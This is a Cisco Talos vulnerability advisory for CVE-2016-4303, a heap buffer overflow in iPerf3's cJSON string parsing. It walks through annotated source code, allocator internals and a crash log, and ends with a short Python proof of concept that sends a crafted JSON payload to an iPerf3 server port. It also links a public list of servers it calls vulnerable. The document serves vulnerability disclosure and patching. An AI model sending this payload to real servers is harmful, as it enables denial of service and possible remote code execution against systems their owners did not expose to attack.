Talos Vulnerability Report

TALOS-2016-0164

ESnet iPerf3 JSON parse_string UTF Code Execution Vulnerability

June 8, 2016

Report ID

CVE-2016-4303

Description

An exploitable remote code execution vulnerability exists in the JSON handling functionality of ESnet iPerf3. A specially crafted JSON string can lead to buffer overflow on the heap resulting in remote code execution. An attacker can send an unauthenticated packet to any reachable iPerf3 server to trigger this vulnerability.

Note a list of iPerf3 servers are listed here that are currently vulnerable to this attack https://iperf.fr/iperf-servers.php

Tested Versions

iperf 3.1.1

Details

ESnet iPerf3 is a tool for active measurements of the maximum achievable bandwidth on IP networks. It supports tuning of various parameters related to timing, protocols, and buffers. For each test it reports the bandwidth, loss, and other parameters.

The vulnerability centers around the mishandling of UTF8/16 strings within cjson.c. When attempting to allocate room for the resulting cstring, a logic error occurs when sscanf reaches a non-hex character (‘”’), however the pointer is incremented by 4 bytes regardless of the result. This skips the quote character causing the while loop to miss the first quote and continue writing until the second quote is found.

This results in an overflow into the next heap structure, clobbering the heap block header. The “key” found in this JSON string does not match any known keys and is later freed. I have commented some of the lines below:

236 static const char *parse_string( cJSON *item, const char *str )
237 {
[...snip...]
250     /* Skip escaped quotes. */
251     while ( *ptr != '\"' && *ptr && ++len ) // extract key from 'ptr'
252         if ( *ptr++ == '\\' )
253             ptr++;
254
255     if ( ! ( out = (char*) cJSON_malloc( len + 1 ) ) ) // Malloc Block Size of 0x3 (actually              reserves 0x20 bytes)
256         return 0;
257
258     ptr = str + 1;  // move ptr past the first quote of the key ("\uC" in this case)
259     ptr2 = out;     // ptr2 will store the resulting cstring
260     while ( *ptr != '\"' && *ptr ) { // until the second quote or backslash is found
261         if ( *ptr != '\\' )         // the slash in \uC is found
262             *ptr2++ = *ptr++;       // ptr2 will store the unescaped contents of ptr overflowing the      block allocated for only 3 bytes
263         else {
264             ptr++;                  // skip the slash found and check the escaped char
265             switch ( *ptr ) {
266                 case 'b': *ptr2++ ='\b'; break;
267                 case 'f': *ptr2++ ='\f'; break;
268                 case 'n': *ptr2++ ='\n'; break;
269                 case 'r': *ptr2++ ='\r'; break;
270                 case 't': *ptr2++ ='\t'; break;
271                 case 'u':                       // UTF8/16 found
272                     /* Transcode utf16 to utf8. */
273                     /* Get the unicode char. */
274                     sscanf( ptr + 1,"%4x", &uc ); // sscanf stops at non-hex char '"'
275                     ptr += 4;                     // ptr inc'd by 4 regardless of sscanf result
													  // making ptr point out of bounds of the buffer
[...snip...]
302                     switch ( len ) {
[...snip...]
306                         case 1: *--ptr2 = ( uc | firstByteMark[len] );
307                     }
308                     ptr2 += len;
309                     break;
310                 default:  *ptr2++ = *ptr; break;
311             }
312             ++ptr;
313         }
314     }
315     *ptr2 = 0;      // terminate cstring
316     if ( *ptr == '\"' )
317         ++ptr;
318     item->valuestring = out; // item is a cJSON struct
319     item->type = cJSON_String;
320     return ptr;
321 }

This object is then compared against a list of keys, the JSON object is deleted and the string is freed.

perf_api.c
1336 static int
1337 get_parameters(struct iperf_test *test)
1338 {
1339     int r = 0;
1340     cJSON *j;
1341     cJSON *j_p;
1342
1343     j = JSON_read(test->ctrl_sck);
1344     if (j == NULL) {
1345     i_errno = IERECVPARAMS;
1346         r = -1;
1347     } else {
1348     if (test->debug) {
1349         printf("get_parameters:\n%s\n", cJSON_Print(j));
1350     }
1351
1352     if ((j_p = cJSON_GetObjectItem(j, "tcp")) != NULL)
1353         set_protocol(test, Ptcp);
1354     if ((j_p = cJSON_GetObjectItem(j, "udp")) != NULL)
1355         set_protocol(test, Pudp);
[...snip...]
1392     if ((j_p = cJSON_GetObjectItem(j, "get_server_output")) != NULL)
1393         iperf_set_test_get_server_output(test, 1);
1394     if ((j_p = cJSON_GetObjectItem(j, "udp_counters_64bit")) != NULL)
1395         iperf_set_test_udp_counters_64bit(test, 1);
1396     if (test->sender && test->protocol->id == Ptcp && has_tcpinfo_retransmits())
1397         test->sender_has_retransmits = 1;
1398     cJSON_Delete(j); // delete the object
1399     }
1400     return r;
1401 }

When attempting to delete the object cJSON->valuestring, the corrupted chunk is read in and then freed:

3833    static void
3834    _int_free (mstate av, mchunkptr p, int have_lock)
3835    {
3836      INTERNAL_SIZE_T size;        /* its size */
3837      mfastbinptr *fb;             /* associated fastbin */
3838   mchunkptr nextchunk;         /* next contiguous chunk */
3839   INTERNAL_SIZE_T nextsize;    /* its size */
3840   int nextinuse;               /* true if nextchunk is used */
3841   INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
3842   mchunkptr bck;               /* misc temp for linking */
3843   mchunkptr fwd;               /* misc temp for linking */
3844
3845   const char *errstr = NULL;
3846   int locked = 0;
3847
3848   size = chunksize (p);
[...]
3960     nextchunk = chunk_at_offset(p, size);

__GI___libc_free (malloc.c:3848)
3848   size = chunksize (p);

>>> p/x size
$70 = 0x20
>>> p/x *p
$71 = {
prev_size = 0x0,
size = 0x21,
fd = 0x454545454545440c,
bk = 0x4646464646464545,
fd_nextsize = 0x4747474747474646,
bk_nextsize = 0x7d4747
}

Crash Information

*** Error in `./iperf3': free(): invalid next size (fast): 0x00000000026165b0 ***
======= Backtrace: =========
/usr/lib/libc.so.6(+0x72055)[0x7fc9bc8cc055]
/usr/lib/libc.so.6(+0x779a6)[0x7fc9bc8d19a6]
/usr/lib/libc.so.6(+0x7818e)[0x7fc9bc8d218e]
./iperf3[0x437525]
./iperf3[0x40d545]
./iperf3[0x40ac35]
./iperf3[0x423891]
./iperf3[0x426495]
./iperf3[0x40274d]
./iperf3[0x402301]
/usr/lib/libc.so.6(__libc_start_main+0xf0)[0x7fc9bc87a610]
./iperf3[0x402049]
======= Memory map: ========
00400000-00448000 r-xp 00000000 fe:02 30935253                           /home/bcake/src/iperf/fuzzing/iperf3
00648000-00649000 rw-p 00048000 fe:02 30935253                           /home/bcake/src/iperf/fuzzing/iperf3
00649000-0064a000 rw-p 00000000 00:00 0
02612000-02633000 rw-p 00000000 00:00 0                                  [heap]
7fc9b8000000-7fc9b8021000 rw-p 00000000 00:00 0
7fc9b8021000-7fc9bc000000 ---p 00000000 00:00 0
7fc9bc644000-7fc9bc65a000 r-xp 00000000 fe:00 265363                     /usr/lib/libgcc_s.so.1
7fc9bc65a000-7fc9bc859000 ---p 00016000 fe:00 265363                     /usr/lib/libgcc_s.so.1
7fc9bc859000-7fc9bc85a000 rw-p 00015000 fe:00 265363                     /usr/lib/libgcc_s.so.1
7fc9bc85a000-7fc9bc9f5000 r-xp 00000000 fe:00 264223                     /usr/lib/libc-2.22.so
7fc9bc9f5000-7fc9bcbf4000 ---p 0019b000 fe:00 264223                     /usr/lib/libc-2.22.so
7fc9bcbf4000-7fc9bcbf8000 r--p 0019a000 fe:00 264223                     /usr/lib/libc-2.22.so
7fc9bcbf8000-7fc9bcbfa000 rw-p 0019e000 fe:00 264223                     /usr/lib/libc-2.22.so
7fc9bcbfa000-7fc9bcbfe000 rw-p 00000000 00:00 0
7fc9bcbfe000-7fc9bcc20000 r-xp 00000000 fe:00 264184                     /usr/lib/ld-2.22.so
7fc9bcdec000-7fc9bcdef000 rw-p 00000000 00:00 0
7fc9bce1d000-7fc9bce1f000 rw-p 00000000 00:00 0
7fc9bce1f000-7fc9bce20000 r--p 00021000 fe:00 264184                     /usr/lib/ld-2.22.so
7fc9bce20000-7fc9bce21000 rw-p 00022000 fe:00 264184                     /usr/lib/ld-2.22.so
7fc9bce21000-7fc9bce22000 rw-p 00000000 00:00 0
7fff0b656000-7fff0b677000 rw-p 00000000 00:00 0                          [stack]
7fff0b6d7000-7fff0b6d9000 r--p 00000000 00:00 0                          [vvar]
7fff0b6d9000-7fff0b6db000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
Aborted (core dumped)

>>> bt
#0  0x00007ffff7a6a5f8 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:55
#1  0x00007ffff7a6ba7a in __GI_abort () at abort.c:89
#2  0x00007ffff7aa905a in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0x7ffff7ba0e10 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
#3  0x00007ffff7aae9a6 in malloc_printerr (action=3, str=0x7ffff7ba0f20 "free(): invalid next size (fast)", ptr=<optimized out>, ar_ptr=<optimized out>) at malloc.c:5000
#4  0x00007ffff7aaf18e in _int_free (av=0x7ffff7dd5b40 <main_arena>, p=<optimized out>, have_lock=0) at malloc.c:3861
#5  0x0000000000437525 in cJSON_Delete (c=c@entry=0x64e560) at cjson.c:119
#6  0x000000000040d545 in get_parameters (test=test@entry=0x64a010) at iperf_api.c:1398
#7  0x000000000040ac35 in iperf_exchange_parameters (test=test@entry=0x64a010) at iperf_api.c:1209
#8  0x0000000000423891 in iperf_accept (test=test@entry=0x64a010) at iperf_server_api.c:161
#9  0x0000000000426495 in iperf_run_server (test=test@entry=0x64a010) at iperf_server_api.c:496
#10 0x000000000040274d in run (test=test@entry=0x64a010) at main.c:154
#11 0x0000000000402301 in main (argc=2, argv=0x7fffffffe7a8) at main.c:111

Proof-of-Concept

#!/usr/bin/env python2
import socket

TCP_IP = '127.0.0.1'
TCP_PORT = 5201
MESSAGE='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00\x00\x00A\x31"\uC":"DEEEEEEEEFFFFFFFFGGGGGGGG}'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(MESSAGE)
s.close()

Credit

Discovered by Dave McDaniel of Cisco Talos

Timeline

2016-04-20 - Initial Vendor Contact
2016-06-08 - Patch Released